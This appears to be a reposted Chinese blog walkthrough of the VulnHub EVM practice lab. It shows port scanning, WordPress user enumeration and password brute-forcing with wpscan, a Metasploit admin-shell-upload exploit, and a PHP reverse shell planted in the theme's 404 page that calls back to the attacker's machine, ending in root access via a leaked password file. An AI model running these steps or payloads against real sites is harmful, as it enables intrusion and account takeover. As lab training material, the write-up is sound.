文章標題
- 1.環境搭建
- 2.資訊收集
- 2.1 主機發現
- 2.2 埠掃描
- 2.3 訪問80埠(http服務)
- 3.漏洞利用
- 3.1 使用wpscan爆破用戶名和密碼進行ssh登錄
- 3.1.1 使用wpscan列舉/wordpress/網頁里面的用戶名
- 3.1.2 使用wpscan 爆破**c0rrupt3d_brain**用戶的密碼
- 3.2 啟動msf使用模塊反彈shell
- 4 提權
- 3.3登錄后臺登錄網頁植入木馬反彈shell
- 4.提權
- 5.總結
1.環境搭建
靶機環境搭建
攻擊滲透機: kali IP地址:192.168.33.139
靶機:EVM IP地址未知
靶機下載地址:https://www.vulnhub.com/entry/evm-1,391/
2.資訊收集
2.1 主機發現
我們要進行滲透,首先得知道目標靶機的IP地址,否則將無從做起
arp-scan -l
掃描獲取到目標靶機IP地址為:192.168.33.146
若掃描不到目標靶機IP地址,可查閱我寫的這篇文章進行解決https://blog.csdn.net/liver100day/article/details/119109320
2.2 埠掃描
既然知道了目標靶機IP地址,那就繼續掃描獲取目標靶機開放的埠,服務和版本資訊
nmap -T4 -sV -A -O -p- 192.168.33.146
#這樣寫的話掃描會花一部分時間,耗時并且被發現風險很大,建議僅在靶機練習時使用
掃描發現目標靶機開放了很多埠,有22埠(ssh服務),80埠(http服務),53埠,110埠,139埠,143埠和445埠和其他系統有關資訊
53埠為DNS(Domain Name Server,域名服務器)服務器所開放,主要用于域名決議,DNS服務在NT系統中使用的最為廣泛,通過DNS服務器可以實作域名與IP地址之間的轉換,只要記住域名就可以快速訪問網站,
110埠是為POP3(郵件協議3)服務開放的,POP2、POP3都是主要用于接收郵件的,目前POP3使用的比較多,許多服務器都同時支持POP2和POP3, 單單POP3服務在用戶名和密碼交換緩沖區溢位的漏洞就不少于20個,比如WebEasyMail POP3 Server合法用戶名資訊泄露漏洞,通過該漏洞遠程攻擊者可以驗證用戶賬戶的存在
139埠是NetBIOS Session埠,用來檔案和列印共享,注意的是運行samba的unix機器也開放了139埠,功能一樣,
143埠主要是用于“Internet Message AccessProtocol”v2(Internet訊息訪問協議,簡稱IMAP),和POP3一樣,是用于電子郵件的接收的協議,
445埠默認開啟microsoft-ds (TCP 445)埠允許遠程用戶連接,Microsoft 2000的microsoft-ds (TCP 445)埠在處理進行資料包時存在漏洞,可導致拒絕服務攻擊,
2.3 訪問80埠(http服務)
目標開啟了80埠,這不明擺著讓我們去訪問一下嗎?
發現是Apache的默認頁面,并且發現了提示,提示存在一個名為“ WordPress”的易受攻擊的目錄,訪問**/wordpress/,這里我能夠訪問,但是卻等了很久,并無任何可用資訊,那我們接下來就使用wpscan**
3.漏洞利用
3.1 使用wpscan爆破用戶名和密碼進行ssh登錄
3.1.1 使用wpscan列舉/wordpress/網頁里面的用戶名
wpscan --url http://192.168.33.146/wordpress/ -e u
找到一個用戶名:c0rrupt3d_brain
3.1.2 使用wpscan 爆破c0rrupt3d_brain用戶的密碼
wpscan自帶的一個密碼字典,在kali里的/usr/share/wordlists/rockyou.txt,不過第一次使用時需要進行解壓
wpscan --url http://192.168.33.146/wordpress/ -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt
爆破需要花費一點時間
爆破得到用戶密碼為:24992499
3.2 啟動msf使用模塊反彈shell
輸入msfconsole打開msf
搜索wordpress對應版本
search wordpress 5.2.4
在被查找到的模塊中使用exploit / unix / webapp / wp_admin_shell_upload模塊
use exploit/unix/webapp/wp_admin_shell_upload
查看需要設定那些引數
show options
一一進行設定
set password 24992499
set username c0rrupt3d_brain
set rhost 192.168.33.146
set TARGETURI /wordpress
再次查看引數,確保引數輸入正確
確保無誤后,輸入run運行,成功獲取到目標shell
4 提權
切換至/home目錄下,發現了**/root3r目錄
發現了一個.root_ password_ ssh. txt檔案,查看這個檔案
發現了willy26**資料,這應該是root用戶的密碼,嘗試切換至root用戶
shell
使用python切換至互動式shell
python -c 'import pty;pty.spawn(:/bin/bash")'
切換成功,成功拿取到root權限,并且在root目錄下找到了successful
拿到了root權限,那目標靶機就已經完全被你攻破了
3.3登錄后臺登錄網頁植入木馬反彈shell
尋找目標網頁后臺登陸頁面,使用剛付訓取到的賬戶密碼進行登錄
dirb http://192.168.33.146
成功找到后臺登錄界面,但我卻怎么也訪問不了,如果大家可以訪問的話,下面是我的思路,大家可以去實驗一下
使用剛付訓取到的用戶名和密碼進行登錄
成功登錄進去
根據流程,先點擊Appearance,再點擊Theme Editor,最后點擊404頁面代碼
向404頁面代碼寫入木馬
$ip="192.168.33.129"; #這里是kali的IP地址
$port=9966; #填寫一個未被占用的埠號
$sock = fsockopen($ip, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
寫好之后保存
再打開一個終端,進行監聽埠
nc -lvp 9966
隨意訪問一個不存在的頁面,觸發404頁面代碼
這樣在你監聽的終端就可以成功反彈shell
4.提權
提權操作就和上面的做法一致了
使用python切換至互動式shell
python -c 'import pty;pty.spawn("/bin/bash")'
成功切換,這樣更利于我們進行操作
查看當前用戶能否以root權限執行命令
sudo -l
看來不行,切換至/home目錄下,發現了**/root3r**目錄
在該目錄下,僅發現了一個test.txt,猜測可能有隱藏檔案(隱藏檔案以.開頭)
ls -la
發現了一個**.root_ password_ ssh. txt檔案,查看這個檔案
發現了willy26**資料,這應該是root用戶的密碼,嘗試切換至root用戶
su root
切換成功,成功拿取到root權限,并且在root目錄下找到了successful
拿到了root權限,那目標靶機就已經完全被你攻破了
5.總結
1.這靶機題型我已經做了很多次了,很簡單的,不解在于為什么需要使用wpscan工具
2.為什么需要使用hi/exploit / unix / webapp / wp_admin_shell_upload模塊
最近一直在學習,但是學習的東西很多很雜,于是便把自己的學習成果記錄下來,便利自己,幫助他人,希望本篇文章能對你有所幫助,有錯誤的地方,歡迎指出!!!喜歡的話,不要忘記點贊哦!!!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/291782.html
標籤:其他
上一篇:BugKu_eval